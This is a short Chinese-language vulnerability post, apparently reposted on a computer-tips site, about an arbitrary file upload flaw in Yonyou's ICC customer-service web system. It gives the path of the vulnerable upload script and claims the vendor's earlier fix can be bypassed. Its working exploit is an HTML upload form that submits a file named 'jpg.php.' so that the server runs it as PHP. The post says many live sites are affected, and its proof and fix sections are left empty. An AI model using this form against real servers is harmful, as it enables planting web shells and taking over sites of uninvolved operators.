再再暴用友ICC网站客服系统任意文件上传漏洞,涛涛电脑知识网,看了一下上一个漏洞:,www.xuhantao.com,发现可以饶过官方修复。
详细说明:测试多个网站均存在漏洞。
/home/ecccs/web/5107/upload/screenImagesSave.php
具体自己看源码这里直接给出利用代码。
<form enctype="multipart/form-data" method="post"
action="?filename=jpg.php.">
<input type="file" name="file">
<input type="submit" name="up" value="上传">
</form>
上一个是jpg.php 这个是只要在jpg.php后面加个.那么 上传后一样可以解析
/xxx.php. 这样一样可以解析为php 的。
测试了:
漏洞证明:
修复方案:
你们懂得!
作者 鬼哥